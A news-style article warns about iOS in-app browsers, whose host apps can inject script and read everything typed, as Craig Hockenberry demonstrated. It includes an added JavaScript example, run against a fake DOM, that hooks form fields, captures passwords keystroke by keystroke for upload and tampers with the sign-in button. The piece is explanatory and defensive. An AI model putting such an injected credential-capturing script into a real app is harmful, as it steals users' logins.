If you regularly use an iPhone or iPad app with a built-in browser, you should know about a weakness in iOS in-app browsers that lets an unscrupulous app developer capture everything you type into them, passwords included.
The problem was demonstrated by Craig Hockenberry, one of the developers behind the Twitterrific client for iOS, who has written on his blog to warn iOS users about a security issue inherent in in-app browsers: the app that embeds the browser controls the web view and can run its own code in the pages it loads, so it can read everything that is entered there.
Hockenberry posted a video and a proof-of-concept app showing the technique in action, including capturing a password as it is typed.
Hockenberry explains the hack:
– The information at the top of the screen is generated by the app, not the web page. This information could easily be uploaded to a remote server.
– This is not phishing: the site shown is the actual Twitter website. This technique can be applied to any site that has an input form. All the attacker needs to know can easily be obtained by viewing the public facing HTML on the site.
– The site content is also modified: the text on the button label is normally “Sign in” and has been changed to “SUCK IT UP”. It seemed appropriate.
– This technique works in iOS 7 and 8 (and probably earlier versions, but I didn’t have an easy way to test them).
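To make the four points above concrete, here is an added example of the kind of script an in-app browser can inject into any page it displays. It is not Hockenberry's proof-of-concept code, and the sign-in form, the fake DOM and the channel back to the host app (modelled as a plain callback) are all constructed so that the example runs under Node without a browser; a real in-app browser would evaluate this in the loaded page and ship the records to its own server. The script hooks every text and password field, forwards each keystroke's value to the host app, skips hidden fields such as a CSRF token (it only wants what the user types), and rewrites the submit button label to show the page itself is under the app's control.

```javascript
// Added example, not from the article or Hockenberry's post. Models the script
// an in-app browser can inject into a page: hook every user-editable field,
// report each change to the host app, and tamper with the page.
// The DOM below is a constructed stand-in so this runs offline under Node.

function installSpy(doc, report) {
  const captured = {};            // name -> { type, value }: what the app sees
  let anonymous = 0;
  for (const field of Array.from(doc.getElementsByTagName('input'))) {
    if (field.type === 'submit') {
      field.value = 'SUCK IT UP';  // the visible tampering from the demo
      continue;
    }
    if (field.type === 'hidden' || field.type === 'button') continue;
    const key = field.name || field.id || 'field' + (anonymous++);
    captured[key] = { type: field.type, value: field.value };
    // 'input' fires on every change, including paste and autofill. The masking
    // on a password field is cosmetic: its value is readable to script.
    field.addEventListener('input', () => {
      captured[key].value = field.value;
      report({ field: key, type: field.type, value: field.value });
    });
  }
  return captured;
}

// Minimal stand-in for the DOM (constructed for this example only).
class FakeElement {
  constructor(tag, attrs) {
    this.tagName = tag.toUpperCase();
    Object.assign(this, { type: 'text', name: '', id: '', value: '' }, attrs);
    this.listeners = {};
  }
  addEventListener(type, fn) {
    (this.listeners[type] = this.listeners[type] || []).push(fn);
  }
  dispatchEvent(evt) {
    for (const fn of this.listeners[evt.type] || []) fn(evt);
  }
}

class FakeDocument {
  constructor(elements) { this.elements = elements; }
  getElementsByTagName(tag) {
    return this.elements.filter(e => e.tagName === tag.toUpperCase());
  }
}

// Simulates a user typing one character at a time, as in the demo video.
function typeInto(field, text) {
  for (const ch of text) {
    field.value += ch;
    field.dispatchEvent({ type: 'input' });
  }
}

// Builds a constructed sign-in form (not Twitter's real markup), installs the
// spy and types credentials into it. Returns what the host app ended up with.
function runDemo() {
  const user = new FakeElement('input', { type: 'text', name: 'username' });
  const pass = new FakeElement('input', { type: 'password', name: 'password' });
  const csrf = new FakeElement('input', { type: 'hidden', name: 'authenticity_token', value: 'tok' });
  const button = new FakeElement('input', { type: 'submit', value: 'Sign in' });
  const doc = new FakeDocument([user, pass, csrf, button]);

  const uploaded = [];   // stands in for the records sent to a remote server
  const captured = installSpy(doc, record => uploaded.push(record));
  typeInto(user, 'alice');
  typeInto(pass, 'hunter2');
  return { captured, uploaded, buttonLabel: button.value };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(runDemo(), null, 2));
}
```

Nothing in the page can defend against this: the script runs with the same privileges as the site's own JavaScript, so TLS, the site's password masking and its CSRF token are all irrelevant. The only check available to the user is the one the article gives, namely whether the login is happening in Safari or inside some app's web view.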
In short, until Apple changes this, think twice before logging into any site through an app's in-app browser. Log into websites only in Safari itself, not in any app that embeds iOS's web view, which, unfortunately, includes third-party iOS browsers such as Chrome, since they are built on the same component.